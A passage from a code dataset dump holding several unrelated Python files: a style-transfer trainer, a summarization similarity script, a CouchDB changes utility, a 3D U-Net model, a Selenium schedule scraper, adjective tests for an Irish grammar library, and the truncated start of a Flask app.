al.\n# The names map to those used in the VGG16 application included\n# with Keras.\n_DEFAULT_STYLE_LAYERS = [\n 'block1_conv2', 'block2_conv2',\n 'block3_conv3', 'block4_conv3'\n]\n_DEFAULT_CONTENT_LAYERS = ['block3_conv3']\n\n# def training_with_config(dict_config):\n# json_config = json.dumps(dict_config)\n# training_with_json(json_config)\n\ndef training_with_json(json_config):\n # args = json.loads(json_config, object_hook=lambda d: namedtuple('Config', d.keys())(*d.values()))\n args = json.loads(json_config)\n training(args)\n\ndef training_with_command(args):\n dict_config = vars(args)\n\n # Set the content and style loss layers.\n content_layers = _DEFAULT_CONTENT_LAYERS\n if args.content_layers:\n content_layers = args.content_layers.split(',')\n\n style_layers = _DEFAULT_STYLE_LAYERS\n if args.style_layers:\n style_layers = args.style_layers.split(',')\n\n style_image_files = args.style_images.split(',')\n image_size = [int(el) for el in args.image_size.split(',')]\n norm_by_channels = args.norm_by_channels or False\n\n dict_config['content_layers'] = content_layers\n dict_config['style_layers'] = style_layers\n dict_config['style_image_files'] = style_image_files\n dict_config['image_size'] = image_size\n dict_config['norm_by_channels'] = norm_by_channels\n\n training(dict_config)\n\n\ndef training(args):\n # use fp16 or not\n # use_fp_16 = args.get(\"use_fp16\", False)\n # if use_fp_16:\n # keras.backend.set_floatx('float16')\n\n # Create model folder like: illegal_beauty_modified_jpg/512_a1_b8_sw1e-05_finetuned/current_time\n style_image = args['style_image_files'][0]\n head, tail = os.path.split(style_image)\n style_name = tail.replace('.','_')\n style_size = str(args['image_size'][0])\n alpha = 'a'+ str(args['alpha'])\n batch_size = 'b' + str(args['batch_size'])\n style_weight = 'sw' + str(args['style_weight'])\n total_variation_weight = 'tvw' + str(args['total_variation_weight'])\n finetuned = ''\n if args['fine_tune_checkpoint']:\n finetuned = '_finetuned'\n\n param_str = style_size + '_' + alpha + '_' + batch_size + '_' + style_weight +'_'+ total_variation_weight + finetuned\n model_name = style_name + '_' + param_str\n\n folder = args['model_folder']\n now = datetime.datetime.now().strftime(\"%Y-%m-%d_%H_%M_%S\")\n path = os.path.join(folder, style_name, param_str, now)\n\n model_path_no_file_extension = os.path.join(path, model_name)\n model_checkpoint_name = model_path_no_file_extension\n\n try:\n os.makedirs(path, 0o755)\n except OSError:\n print(\"Creation of the directory %s failed\" % path)\n else:\n print(\"Successfully created the directory %s \" % path)\n\n trainer.train(\n args['training_image_dset'],\n args['style_image_files'],\n model_checkpoint_name,\n args['content_layers'],\n args['style_layers'],\n content_weight=args['content_weight'],\n style_weight=args['style_weight'],\n total_variation_weight=args['total_variation_weight'],\n image_size=args['image_size'],\n alpha=args['alpha'],\n batch_size=args['batch_size'],\n num_iterations=args['num_iterations'],\n learning_rate=args['learning_rate'],\n log_interval=args['log_interval'],\n checkpoint_interval=args['checkpoint_interval'],\n fine_tune_checkpoint=args['fine_tune_checkpoint'],\n norm_by_channels=args['norm_by_channels'],\n gcs_bucket=args['gcs_bucket'],\n use_small_network=args['use_small_network'],\n copy_interval=args['copy_interval']\n )\n\n logger.info('Done.')\n\n last_model_name = model_path_no_file_extension + '-' + str(args['num_iterations']) + '.h5'\n return style_name, param_str, now, last_model_name\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Train a Style Transfer Network.'\n )\n\n parser.add_argument(\n '--model-folder', type=str, required=True,\n help='An folder to save the trained network and etc.'\n )\n parser.add_argument(\n '--training-image-dset', type=str, required=True,\n help=('An h5 file containing images to trian with. The dset must '\n 'contain a key `images` with the arrays.')\n )\n parser.add_argument(\n '--style-images', type=str, required=True,\n help='A comma separated list of images to take styles from.'\n )\n parser.add_argument(\n '--model-checkpoint-name', type=str, required=True,\n help='An file to save the trained network.'\n )\n parser.add_argument(\n '--image-size', default='256,256', type=str,\n help='The size of the image H,W'\n )\n parser.add_argument(\n '--content-layers', type=str,\n help=('A comma separated list of VGG layers to use for '\n 'computing content loss')\n )\n parser.add_argument(\n '--style-layers', type=str,\n help=('A comma separated list of VGG layers to use for '\n 'computing style loss')\n )\n parser.add_argument(\n '--content-weight', type=float, default=1.0,\n help='Content loss weight'\n )\n parser.add_argument(\n '--style-weight', type=float, default=1e-4,\n help='Style loss weight'\n )\n parser.add_argument(\n '--total-variation-weight', type=float, default=0,\n help='Total variation loss weight'\n )\n parser.add_argument(\n '--num-iterations', type=int, default=40000,\n help='Number of iterations to train for.'\n )\n parser.add_argument(\n '--batch-size', type=int, default=4,\n help='The batch size to train with.'\n )\n parser.add_argument(\n '--learning-rate', type=float, default=0.001,\n help='The learning rate.'\n )\n parser.add_argument(\n '--log-interval', type=int, default=10,\n help='the interval at which log statements are printed.'\n )\n parser.add_argument(\n '--checkpoint-interval', type=int, default=10,\n help='the interval at which model checkpoints are saved.'\n )\n parser.add_argument(\n '--fine-tune-checkpoint', type=str,\n help='A checkpoint file to finetune from.'\n )\n parser.add_argument(\n '--alpha', type=float, default=1.0,\n help='the width parameter controlling the number of filters'\n )\n parser.add_argument(\n '--norm-by-channels', action='store_true',\n help='if present, normalize gram matrix by channel'\n )\n parser.add_argument(\n '--gcs-bucket', type=str,\n help='a gcs bucket to save results to.'\n )\n parser.add_argument(\n '--use-small-network', action='store_true',\n help=('Use a very small network architecture that works in real time '\n 'on some mobile devices using only CPU')\n )\n parser.add_argument(\n '--copy-interval', type=int, default=1000,\n help='Save multiple models by iteration count like model-100, model-2000 and etc.'\n )\n parser.add_argument(\n '--use-fp16', type=bool, default=False,\n help='Use fp16 for training'\n )\n\n args, unknown = parser.parse_known_args()\n training_with_command(args)\n","sub_path":"style_transfer/style_transfer/train2.py","file_name":"train2.py","file_ext":"py","file_size_in_byte":7496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"94004242","text":"import pandas as pd\nfrom tqdm import tqdm\nimport nltk\nfrom multiprocessing import Pool,cpu_count\nfrom copy import deepcopy\nimport math\nimport sys\nimport gensim\nfrom functools import partial\nimport os\nimport numpy as np\nimport pickle\n\ndef contain_digits(token):\n return any(char.isdigit() for char in token)\n\n\ndef initializer():\n global sw\n sw = set(nltk.corpus.stopwords.words('english'))\n sw.add(\"s\")\n\n\n\ndef read_df(fname):\n df = pd.read_csv(fname,delimiter=\"\\t\",names=[\"query\",\"input_paragraph\"])\n return df\n\n\ndef list_multiprocessing(param_lst, func, **kwargs):\n workers = kwargs.pop('workers')\n with Pool(workers,initializer,()) as p:\n apply_lst = [([params], func, i, kwargs) for i, params in enumerate(param_lst)]\n result = list(tqdm(p.imap(_apply_lst, apply_lst), total=len(apply_lst)))\n return [_[1] for _ in result]\n\n\ndef _apply_lst(args):\n params, func, num, kwargs = args\n return num, func(*params, **kwargs)\n\ndef read_queries(fname):\n result=[]\n with open(fname) as f:\n for line in f:\n query = line.split(\":\")[1].rstrip()\n result.append(\"_\".join(query.split()))\n return result\n\ndef get_args(translations_dir,queries):\n return [translations_dir+query for query in queries]\n\n\n\n\ndef cosine_similarity(v1,v2):\n sumxx, sumxy, sumyy = 0, 0, 0\n for i in range(len(v1)):\n x = v1[i]; y = v2[i]\n sumxx += x*x\n sumyy += y*y\n sumxy += x*y\n if sumxx==0 or sumyy==0:\n return 0\n return sumxy/math.sqrt(sumxx*sumyy)\n\n\ndef is_in(query,text):\n res = set(query.split()).intersection(text.rstrip().split())\n return bool(res)\n\n\ndef load_vector(fname):\n with open(fname,\"rb\") as file:\n return pickle.load(file)\n\n\ndef calculate_similarities(query, centroid,sentence, fname):\n if is_in(query, sentence):\n return -float(\"inf\")\n cent_sentence = load_vector(fname)\n if cent_sentence is None:\n return -float(\"inf\")\n return cosine_similarity(centroid,cent_sentence)\n\n\ndef insert_to_queue(q,sim,paragraph,min_val):\n if len(q)<100:\n q.append((sim,paragraph))\n min_val = min(q,key=lambda x:x[0])[0]\n return q,min_val\n elif sim>min_val:\n q.append((sim,paragraph))\n q= sorted(q,key=lambda x:x[0])\n return q[1:],q[1][0]\n return q,min_val\n\ndef find_most_similar_sentences(input_vector_dir, input_file,cluster_dir, input_dir, query):\n df = pd.read_csv(input_file,delimiter = \",\",header=0,chunksize=100000)\n centroid = load_vector(cluster_dir + query+\".pkl\")\n queue = []\n q = \" \".join(query.split(\"_\"))\n min_val = -float(\"inf\")\n global_index =0\n for chunk in df:\n for row in chunk.itertuples():\n sentence =str(row[4])\n if sentence==\"\":\n continue\n fname = input_vector_dir+str(global_index%1000)+\"/\"+str(global_index)+\".pkl\"\n sim = calculate_similarities(q,centroid=centroid,sentence=sentence,fname=fname)\n queue,min_val=insert_to_queue(queue,sim,sentence,min_val)\n global_index+=1\n rows ={}\n i=0\n for item in queue:\n row={}\n row[\"query\"]=q\n row[\"input_paragraph\"] = item[1]\n rows[i]=row\n i+=1\n pd.DataFrame.from_dict(rows,orient=\"index\").to_csv(input_dir+query)\n\ndef recovery_mode(queries,output_dir,target_dir):\n finished = [f.replace(\".csv\",\"\") for f in os.listdir(output_dir)]\n updated_queries = [q for q in queries if q not in finished and os.path.isfile(target_dir+q)]\n return updated_queries\n\n\nif __name__==\"__main__\":\n input_dir = sys.argv[1]\n target_dir = sys.argv[2]\n queries_file = sys.argv[3]\n model_file = sys.argv[4]\n input_file = sys.argv[5]\n input_vector_dir = sys.argv[6]\n cluster_dir = sys.argv[7]\n recovery = sys.argv[8]\n queries = read_queries(queries_file)\n print(\"there are \",str(len(queries)),\"queries\",flush=True)\n if recovery == \"True\":\n queries = recovery_mode(queries,input_dir,target_dir)\n print(\"Recovery mode detected, updated number of queries:\" + str(len(queries)))\n func = partial(find_most_similar_sentences,input_vector_dir, input_file,cluster_dir,input_dir)\n if not os.path.exists(input_dir):\n os.makedirs(input_dir)\n workers = cpu_count()-1\n list_multiprocessing(queries,func,workers=workers)\n\n\n\n\n\n\n\n","sub_path":"summarization/create_input_pool_computed_vecs.py","file_name":"create_input_pool_computed_vecs.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"339105925","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-i686/egg/couchutil/changes.py\n# Compiled at: 2010-01-19 08:32:26\n__doc__ = '\\nGeneral-purpose CouchDB utilities.\\n'\nimport itertools, logging, time\nlog = logging.getLogger()\n\nclass ChangesProcessor(object):\n \"\"\"\n Utility class to process updates in a CouchDB database since some known\n point in the database's history.\n\n When called, the processor uses the database's _all_docs_by_seq view to\n walk the changes in sequence. Progress is stored in the statefile to make\n future calls efficient.\n\n By default, the processor does nothing. Subclass it and override\n handle_update and handle_delete. You can also override at the\n handle_changes level if necessary.\n \"\"\"\n\n def __init__(self, db, statefile, batch_size=25, forever=False, poll_delay=None):\n self.db = db\n self.__statefile = statefile\n self.batch_size = batch_size\n self.forever = forever\n self.poll_delay = poll_delay\n\n def __call__(self):\n if self.forever and self.poll_delay:\n self.run_forever_poll()\n elif self.forever:\n self.run_forever()\n else:\n self.run_once()\n\n def run_forever_poll(self):\n while True:\n self.run_once()\n time.sleep(self.poll_delay)\n\n def run_forever(self):\n while True:\n changes_resource = self.db.resource('_changes')\n startkey = self._read_startkey()\n args = {'feed': 'longpoll'}\n if startkey is not None:\n args['since'] = startkey\n (headers, changes) = changes_resource.get(**args)\n for batch in ibatch(changes['results'], self.batch_size):\n batch = list(batch)\n self.handle_changes([ result['id'] for result in batch ])\n self._write_startkey(batch[(-1)]['seq'])\n\n self._write_startkey(changes['last_seq'])\n\n return\n\n def run_once(self):\n while True:\n startkey = self._read_startkey()\n log.debug('Reading updates from %r', startkey)\n args = {'limit': self.batch_size}\n if startkey is not None:\n args['startkey'] = startkey\n rows = list(self.db.view('_all_docs_by_seq', **args))\n if not rows:\n break\n self.handle_changes([ row['id'] for row in rows ])\n self._write_startkey(rows[(-1)]['key'])\n\n return\n\n def handle_changes(self, ids):\n for row in self.db.view('_all_docs', keys=ids, include_docs=True):\n if row.doc is None:\n self.handle_delete(row.key)\n else:\n self.handle_update(row.doc)\n\n return\n\n def handle_delete(self, docid):\n log.debug('Ignoring deletion: %s', docid)\n\n def handle_update(self, doc):\n log.debug('Ignoring update: %s@%s', doc['_id'], doc['_rev'])\n\n def _read_startkey(self):\n try:\n return int(open(self.__statefile, 'rb').read())\n except IOError:\n return\n\n return\n\n def _write_startkey(self, startkey):\n open(self.__statefile, 'wb').write(str(startkey))\n\n\ndef ibatch(iterable, size):\n sourceiter = iter(iterable)\n while True:\n batchiter = itertools.islice(sourceiter, size)\n yield itertools.chain([batchiter.next()], batchiter)","sub_path":"pycfiles/couchutils-0.4.0-py3-none-any/changes.py","file_name":"changes.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"533565736","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2019 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# SPDX-License-Identifier: EPL-2.0\n#\n\nimport numpy as np\nimport tensorflow as tf\nimport keras as K\n#from tensorflow import keras as K\n\nclass unet(object):\n\n def __init__(self, use_upsampling=False, learning_rate=0.001,\n n_cl_in=1, n_cl_out=1, feature_maps = 16,\n dropout=0.2, print_summary=False,\n channels_last = True):\n\n self.channels_last = channels_last\n if channels_last:\n self.concat_axis = -1\n self.data_format = \"channels_last\"\n\n else:\n self.concat_axis = 1\n self.data_format = \"channels_first\"\n\n #print(\"Data format = \" + self.data_format)\n K.backend.set_image_data_format(self.data_format)\n\n self.fms = feature_maps # 16 or 32 feature maps in the first convolutional layer\n\n self.use_upsampling = use_upsampling\n self.dropout = dropout\n self.print_summary = print_summary\n self.n_cl_in = n_cl_in\n self.n_cl_out = n_cl_out\n\n # self.loss = self.dice_coef_loss\n self.loss = self.combined_dice_ce_loss\n\n self.learning_rate = learning_rate\n self.optimizer = K.optimizers.Adam(lr=self.learning_rate)\n\n self.metrics= [self.dice_coef, self.soft_dice_coef, \"accuracy\",\n self.sensitivity, self.specificity]\n\n self.custom_objects = {\n \"combined_dice_ce_loss\": self.combined_dice_ce_loss,\n \"dice_coef_loss\": self.dice_coef_loss,\n \"dice_coef\": self.dice_coef,\n \"soft_dice_coef\": self.soft_dice_coef,\n \"sensitivity\": self.sensitivity,\n \"specificity\": self.specificity}\n\n self.model = self.unet_3d()\n\n def dice_coef(self, target, prediction, axis=(1, 2, 3), smooth=0.01):\n \"\"\"\n Sorenson Dice\n \\frac{ 2 \\times \\left | T \\right | \\cap \\left | P \\right |}{ \\left | T \\right | + \\left | P \\right | }\n where T is ground truth mask and P is the prediction mask\n \"\"\"\n prediction = tf.round(prediction) # Round to 0 or 1\n\n intersection = tf.reduce_sum(target * prediction, axis=axis)\n union = tf.reduce_sum(target + prediction, axis=axis)\n numerator = tf.constant(2.) * intersection + smooth\n denominator = union + smooth\n coef = numerator / denominator\n\n return tf.reduce_mean(coef)\n\n def soft_dice_coef(self, target, prediction, axis=(1, 2, 3), smooth=0.01):\n \"\"\"\n Sorenson (Soft) Dice - Don't round predictions\n \\frac{ 2 \\times \\left | T \\right | \\cap \\left | P \\right |}{ \\left | T \\right | + \\left | P \\right | }\n where T is ground truth mask and P is the prediction mask\n \"\"\"\n intersection = tf.reduce_sum(target * prediction, axis=axis)\n union = tf.reduce_sum(target + prediction, axis=axis)\n numerator = tf.constant(2.) * intersection + smooth\n denominator = union + smooth\n coef = numerator / denominator\n\n return tf.reduce_mean(coef)\n\n\n def dice_coef_loss(self, target, prediction, axis=(1, 2, 3), smooth=0.1):\n \"\"\"\n Sorenson (Soft) Dice loss\n Using -log(Dice) as the loss since it is better behaved.\n Also, the log allows avoidance of the division which\n can help prevent underflow when the numbers are very small.\n \"\"\"\n intersection = tf.reduce_sum(prediction * target, axis=axis)\n p = tf.reduce_sum(prediction, axis=axis)\n t = tf.reduce_sum(target, axis=axis)\n numerator = tf.reduce_mean(intersection + smooth)\n denominator = tf.reduce_mean(t + p + smooth)\n dice_loss = -tf.log(2.*numerator) + tf.log(denominator)\n\n return dice_loss\n\n\n def combined_dice_ce_loss(self, target, prediction, axis=(1, 2, 3),\n smooth=0.1, weight=0.7):\n \"\"\"\n Combined Dice and Binary Cross Entropy Loss\n \"\"\"\n return weight*self.dice_coef_loss(target, prediction, axis, smooth) + \\\n (1-weight)*K.losses.binary_crossentropy(target, prediction)\n\n\n def unet_3d(self):\n \"\"\"\n 3D U-Net\n \"\"\"\n def ConvolutionBlock(x, name, fms, params):\n \"\"\"\n Convolutional block of layers\n Per the original paper this is back to back 3D convs\n with batch norm and then ReLU.\n \"\"\"\n\n x = K.layers.Conv3D(filters=fms, **params, name=name+\"_conv0\")(x)\n x = K.layers.BatchNormalization(name=name+\"_bn0\")(x)\n x = K.layers.Activation(\"relu\", name=name+\"_relu0\")(x)\n\n x = K.layers.Conv3D(filters=fms, **params, name=name+\"_conv1\")(x)\n x = K.layers.BatchNormalization(name=name+\"_bn1\")(x)\n x = K.layers.Activation(\"relu\", name=name)(x)\n\n return x\n\n if self.channels_last:\n input_shape = [None, None, None, self.n_cl_in]\n else:\n input_shape = [self.n_cl_in, None, None, None]\n\n inputs = K.layers.Input(shape=input_shape,\n name=\"MRImages\")\n\n params = dict(kernel_size=(3, 3, 3), activation=None,\n padding=\"same\", data_format=self.data_format,\n kernel_initializer=\"he_uniform\")\n\n # Transposed convolution parameters\n params_trans = dict(data_format=self.data_format,\n kernel_size=(2, 2, 2), strides=(2, 2, 2),\n padding=\"same\")\n\n\n # BEGIN - Encoding path\n encodeA = ConvolutionBlock(inputs, \"encodeA\", self.fms, params)\n poolA = K.layers.MaxPooling3D(name=\"poolA\", pool_size=(2, 2, 2))(encodeA)\n\n encodeB = ConvolutionBlock(poolA, \"encodeB\", self.fms*2, params)\n poolB = K.layers.MaxPooling3D(name=\"poolB\", pool_size=(2, 2, 2))(encodeB)\n\n encodeC = ConvolutionBlock(poolB, \"encodeC\", self.fms*4, params)\n poolC = K.layers.MaxPooling3D(name=\"poolC\", pool_size=(2, 2, 2))(encodeC)\n\n encodeD = ConvolutionBlock(poolC, \"encodeD\", self.fms*8, params)\n poolD = K.layers.MaxPooling3D(name=\"poolD\", pool_size=(2, 2, 2))(encodeD)\n\n encodeE = ConvolutionBlock(poolD, \"encodeE\", self.fms*16, params)\n # END - Encoding path\n\n # BEGIN - Decoding path\n if self.use_upsampling:\n up = K.layers.UpSampling3D(name=\"upE\", size=(2, 2, 2),\n interpolation=\"bilinear\")(encodeE)\n else:\n up = K.layers.Conv3DTranspose(name=\"transconvE\", filters=self.fms*8,\n **params_trans)(encodeE)\n concatD = K.layers.concatenate(\n [up, encodeD], axis=self.concat_axis, name=\"concatD\")\n\n decodeC = ConvolutionBlock(concatD, \"decodeC\", self.fms*8, params)\n\n if self.use_upsampling:\n up = K.layers.UpSampling3D(name=\"upC\", size=(2, 2, 2),\n interpolation=\"bilinear\")(decodeC)\n else:\n up = K.layers.Conv3DTranspose(name=\"transconvC\", filters=self.fms*4,\n **params_trans)(decodeC)\n concatC = K.layers.concatenate(\n [up, encodeC], axis=self.concat_axis, name=\"concatC\")\n\n decodeB = ConvolutionBlock(concatC, \"decodeB\", self.fms*4, params)\n\n if self.use_upsampling:\n up = K.layers.UpSampling3D(name=\"upB\", size=(2, 2, 2),\n interpolation=\"bilinear\")(decodeB)\n else:\n up = K.layers.Conv3DTranspose(name=\"transconvB\", filters=self.fms*2,\n **params_trans)(decodeB)\n concatB = K.layers.concatenate(\n [up, encodeB], axis=self.concat_axis, name=\"concatB\")\n\n decodeA = ConvolutionBlock(concatB, \"decodeA\", self.fms*2, params)\n\n if self.use_upsampling:\n up = K.layers.UpSampling3D(name=\"upA\", size=(2, 2, 2),\n interpolation=\"bilinear\")(decodeA)\n else:\n up = K.layers.Conv3DTranspose(name=\"transconvA\", filters=self.fms,\n **params_trans)(decodeA)\n concatA = K.layers.concatenate(\n [up, encodeA], axis=self.concat_axis, name=\"concatA\")\n\n # END - Decoding path\n\n convOut = ConvolutionBlock(concatA, \"convOut\", self.fms, params)\n\n prediction = K.layers.Conv3D(name=\"PredictionMask\",\n filters=self.n_cl_out, kernel_size=(1, 1, 1),\n data_format=self.data_format,\n activation=\"sigmoid\")(convOut)\n\n model = K.models.Model(inputs=[inputs], outputs=[prediction])\n\n if self.print_summary:\n model.summary()\n\n return model\n\n\n def sensitivity(self, target, prediction, axis=(1, 2, 3), smooth=0.0001):\n \"\"\"\n Sensitivity\n \"\"\"\n prediction = tf.round(prediction)\n\n intersection = tf.reduce_sum(prediction * target, axis=axis)\n coef = (intersection + smooth) / (tf.reduce_sum(target,\n axis=axis) + smooth)\n return tf.reduce_mean(coef)\n\n\n def specificity(self, target, prediction, axis=(1, 2, 3), smooth=0.0001):\n \"\"\"\n Specificity\n \"\"\"\n prediction = tf.round(prediction)\n\n intersection = tf.reduce_sum(prediction * target, axis=axis)\n coef = (intersection + smooth) / (tf.reduce_sum(prediction,\n axis=axis) + smooth)\n return tf.reduce_mean(coef)\n","sub_path":"3D/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"473848537","text":"from selenium import webdriver\nimport datetime\nfrom bs4 import BeautifulSoup\nimport time\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('--headless')\ndriver = webdriver.Chrome(\"./chromedriver\") # 今は chrome_options= ではなく options=\n\ndriver.get('https://hikonii-group-schedule.herokuapp.com/login')\n\n# input ID and Pass\nprint('トップページをクローリング中')\nemail = driver.find_element_by_name(\"session[email]\")\nemail.send_keys(\"test@test.test\")\npassword = driver.find_element_by_name(\"session[password]\")\npassword.send_keys(\"test\")\n\n# click login button\nlogin_button = driver.find_element_by_name(\"commit\")\nlogin_button.click()\n\n\n# transition to top page\ndriver.get('https://hikonii-group-schedule.herokuapp.com/')\n\n# get page html source\nhtml = driver.page_source\nwith open('./test.html', 'w') as f:\n f.write(html)\n\ndriver.quit()\nprint('クローリング完了')\n\nprint('トップページのスクレイピング開始')\n\n\nwith open('test.html', 'r') as html:\n soup = BeautifulSoup(html, 'html.parser')\n events = soup.find_all('tr')\n result_list = []\n for event in events[1:]:\n result_list.append([event['id'], str(event.find('td'))[23:31]])\n print(\"トップページのスクレイピング結果は以下の通り\")\n print(result_list)\n result = result_list\n print(\"スクレイピング完了\")\n\nprint('各ページのスクレイピング開始')\n\n\ndef date_formatted(event_date_str):\n return datetime.datetime.strptime(event_date_str, \"%Y%m%d\").date()\n\n\ndef crawling_each_page2(id):\n options = webdriver.ChromeOptions()\n options.add_argument('--headless')\n driver = webdriver.Chrome(\"./chromedriver\")\n print('詳細ページへのアクセスを開始します')\n driver.get('https://hikonii-group-schedule.herokuapp.com/login')\n\n # input ID and Pass\n email = driver.find_element_by_name(\"session[email]\")\n email.send_keys(\"test@test.test\")\n password = driver.find_element_by_name(\"session[password]\")\n password.send_keys(\"test\")\n\n # click login button\n login_button = driver.find_element_by_name(\"commit\")\n login_button.click()\n\n time.sleep(1)\n\n driver.get('https://hikonii-group-schedule.herokuapp.com/schedules/' + id)\n html = driver.page_source\n\n driver.quit()\n print(\"クローリング完了\")\n return html\n\n\ndef each_information2(html):\n soup = BeautifulSoup(html, 'html.parser')\n attr_list = [\"event\", \"location\", \"date\", \"detail\"]\n result_list = []\n for i in attr_list:\n content = soup.find(class_=i).text\n result_list.append([i, content])\n print(\"このイベントの詳細は以下の通り\")\n print(result_list)\n return result_list\n\n\ndef shaping_content2(result_list):\n mail_content = result_list[0][1]\n mail_content += \"\\n\"\n mail_content += result_list[2][1]\n mail_content += \"\\n\"\n mail_content += result_list[1][1]\n mail_content += \"\\n\"\n mail_content += result_list[3][1]\n mail_content += \"\\n\\n\"\n print(mail_content)\n print('を送信します')\n return mail_content\n\n\n# 日付による判定の準備\ntoday = datetime.datetime.today()\ntomorrow = (today + datetime.timedelta(days=1)).date()\nfour_days_later = (today + datetime.timedelta(days=4)).date()\ntoday_weekday = today.weekday()\n\n# 日付により判定→メール作成\nif today_weekday == 2: # もし今日が水曜日なら\n # 今週末の予定\n subject = '今週末の練習予定(自動配信)'\n mail_content = \"今週末の練習予定です。\\n\\n\"\n for i in result:\n if four_days_later >= date_formatted(i[1]): # その予定が4日後以内にあるなら\n html1 = crawling_each_page2(i[0])\n information = each_information2(html1)\n mail_content += shaping_content2(information)\n if mail_content != \"今週末の練習予定です。\\n\\n\": # もし今週末の予定が何かしらあるならメールを送信する。\n mail_content += \"\\n出欠の回答はこちらから→https://hikonii-group-schedule.herokuapp.com\"\n print('この内容でメールを送ることができます')\n print(mail_content)\n\nfor j in result:\n if tomorrow == date_formatted(j[1]):\n # 明日の予定\n subject1 = '明日の練習予定(自動配信)'\n mail_content = '明日の練習予定です。\\n\\n'\n html2 = crawling_each_page2(j[0])\n information = each_information2(html2)\n mail_content += shaping_content2(information)\n mail_content += \"\\n出欠の回答はこちらから→https://hikonii-group-schedule.herokuapp.com\"\n print('この内容でメールを送ることができます')\n print(mail_content)","sub_path":"hello/utils/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"647898150","text":"# coding=UTF-8\nfrom pygramadan.adjective import Adjective, example_xml\nfrom pygramadan.forms import Form\nfrom lxml.doctestcompare import LXMLOutputChecker, PARSE_XML\nimport io\n\n\nBEAG_XML = example_xml()\n\n\ndef test_create():\n sg_nom = [Form(\"beag\")]\n sg_gen_masc = [Form(\"big\")]\n sg_gen_fem = [Form(\"bige\")]\n pl_nom = [Form(\"beaga\")]\n graded = [Form(\"lú\")]\n abstract = [Form(\"laghad\")]\n beag = Adjective(disambig=\"\",\n declension=1,\n sg_nom=sg_nom,\n sg_gen_masc=sg_gen_masc,\n sg_gen_fem=sg_gen_fem,\n pl_nom=pl_nom,\n graded=graded,\n abstract=abstract)\n assert beag is not None\n\n\ndef make_beag():\n sg_nom = [Form(\"beag\")]\n sg_gen_masc = [Form(\"big\")]\n sg_gen_fem = [Form(\"bige\")]\n pl_nom = [Form(\"beaga\")]\n graded = [Form(\"lú\")]\n abstract = [Form(\"laghad\")]\n beag = Adjective(disambig=\"\",\n declension=1,\n sg_nom=sg_nom,\n sg_gen_masc=sg_gen_masc,\n sg_gen_fem=sg_gen_fem,\n pl_nom=pl_nom,\n graded=graded,\n abstract=abstract)\n return beag\n\n\ndef test_get_lemma():\n beag = make_beag()\n assert beag.get_lemma() == 'beag'\n\n\ndef test_read_xml():\n sio = io.StringIO(BEAG_XML)\n beag = Adjective(source=sio)\n assert beag.get_lemma() == 'beag'\n\n\ndef test_to_xml():\n beag = make_beag()\n xml = beag.to_xml()\n checker = LXMLOutputChecker()\n assert checker.check_output(BEAG_XML, xml, PARSE_XML) is True\n\n\ndef test_get_indentifier():\n beag = make_beag()\n assert beag.get_identifier() == 'beag_adj1'\n\n\ndef test_get_compar_pres():\n beag = make_beag()\n assert beag.get_compar_pres()[0].value == 'níos lú'\n\n\ndef test_get_super_pres():\n beag = make_beag()\n assert beag.get_super_pres()[0].value == 'is lú'\n\n\ndef test_get_compar_past():\n beag = make_beag()\n assert beag.get_compar_past()[0].value == 'ní ba lú'\n dummy1 = Adjective(graded=[Form(\"adha\")])\n assert dummy1.get_compar_past()[0].value == \"ní b'adha\"\n dummy2 = Adjective(graded=[Form(\"fusa\")])\n assert dummy2.get_compar_past()[0].value == \"ní b'fhusa\"\n\n\ndef test_get_super_past():\n beag = make_beag()\n assert beag.get_super_past()[0].value == 'ba lú'\n dummy1 = Adjective(graded=[Form(\"adha\")])\n assert dummy1.get_super_past()[0].value == \"ab adha\"\n dummy2 = Adjective(graded=[Form(\"fusa\")])\n assert dummy2.get_super_past()[0].value == \"ab fhusa\"\n\n\ndef test_get_all_forms():\n beag = make_beag()\n beag_list = beag.get_all_forms(abstract=False)\n assert len(beag_list) == 5\n exp1 = [('sg_nom', 'beag'), ('sg_gen_masc', 'big'), ('sg_gen_fem', 'bige'), ('pl_nom', 'beaga'), ('graded', 'lú')]\n beag_list.sort()\n exp1.sort()\n assert beag_list == exp1\n beag_list2 = beag.get_all_forms()\n assert len(beag_list2) == 6\n exp2 = exp1 + [('abstract', 'laghad')]\n beag_list2.sort()\n exp2.sort()\n assert beag_list2 == exp2\n","sub_path":"tests/test_adjective.py","file_name":"test_adjective.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"413027748","text":"# Copyright (c) 2020 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport logging\nimport time\nimport threading\nfrom typing import Dict\n\nfrom dataclasses import asdict\nfrom flask import Flask, request, 